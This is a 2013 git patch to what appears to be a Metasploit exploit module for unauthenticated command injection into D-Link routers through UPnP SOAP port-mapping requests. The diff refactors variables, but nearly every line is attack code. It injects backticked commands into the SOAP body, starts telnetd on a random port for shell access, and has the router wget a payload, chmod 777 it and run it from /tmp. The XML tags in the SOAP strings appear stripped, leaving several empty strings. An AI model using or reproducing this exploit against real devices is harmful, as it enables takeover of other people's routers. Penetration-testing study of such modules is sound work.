From 4beea52449dece63a906d4c0ce176b3b8442c8d8 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 Date: Fri, 19 Jul 2013 14:46:17 -0500 Subject: [PATCH] Use instance variables --- .../linux/http/dlink_upnp_exec_noauth.rb | 40 +++++++++---------- 1 file changed, 20 insertions(+), 20 deletions(-) diff --git a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb index 8e6c4af07b..5bb7c698d4 100644 --- a/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb +++ b/modules/exploits/linux/http/dlink_upnp_exec_noauth.rb @@ -85,51 +85,51 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - new_portmapping_description = rand_text_alpha(8) - new_external_port = rand(65535) - new_internal_port = rand(65535) + @new_portmapping_descr = rand_text_alpha(8) + @new_external_port = rand(65535) + @new_internal_port = rand(65535) if target.name =~ /CMD/ - exploit_cmd(new_external_port, new_internal_port, new_portmapping_description) + exploit_cmd elsif target.name =~ /Telnet/ - exploit_telnet(new_external_port, new_internal_port, new_portmapping_description) + exploit_telnet else - exploit_mips(new_external_port, new_internal_port, new_portmapping_description) + exploit_mips end end - def exploit_cmd(new_external_port, new_internal_port, new_portmapping_description) + def exploit_cmd if not (datastore['CMD']) fail_with(Exploit::Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible") end cmd = payload.encoded type = "add" - res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) + res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state") type = "delete" - res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) + res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end return end - def exploit_telnet(new_external_port, new_internal_port, new_portmapping_description) + def exploit_telnet telnetport = rand(65535) vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}") cmd = "telnetd -p #{telnetport}" type = "add" - res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) + res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end type = "delete" - res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) + res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end @@ -168,7 +168,7 @@ class Metasploit3 < Msf::Exploit::Remote return end - def exploit_mips(new_external_port, new_internal_port, new_portmapping_description) + def exploit_mips downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8)) @@ -220,7 +220,7 @@ class Metasploit3 < Msf::Exploit::Remote cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}; chmod 777 /tmp/#{filename}; /tmp/#{filename}" type = "add" - res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) + res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload") end @@ -236,13 +236,13 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("/tmp/#{filename}") type = "delete" - res = request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) + res = request(cmd, type) if (!res or res.code != 200 or res.headers['Server'].nil? or res.headers['Server'] !~ /Linux\,\ UPnP\/1.0,\ DIR/) fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") end end - def request(cmd, type, new_external_port, new_internal_port, new_portmapping_description) + def request(cmd, type) uri = '/soap.cgi' @@ -256,14 +256,14 @@ class Metasploit3 < Msf::Exploit::Remote soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping" data_cmd << "" - data_cmd << "#{new_portmapping_description}" + data_cmd << "#{@new_portmapping_descr}" data_cmd << "" data_cmd << "`#{cmd}`" data_cmd << "1" - data_cmd << "#{new_external_port}" + data_cmd << "#{@new_external_port}" data_cmd << "" data_cmd << "TCP" - data_cmd << "#{new_internal_port}" + data_cmd << "#{@new_internal_port}" data_cmd << "" else #we should clean it up ... otherwise we are not able to exploit it multiple times @@ -271,7 +271,7 @@ class Metasploit3 < Msf::Exploit::Remote soapaction = "urn:schemas-upnp-org:service:WANIPConnection:1#DeletePortMapping" data_cmd << "" - data_cmd << "TCP#{new_external_port}" + data_cmd << "TCP#{@new_external_port}" data_cmd << "" end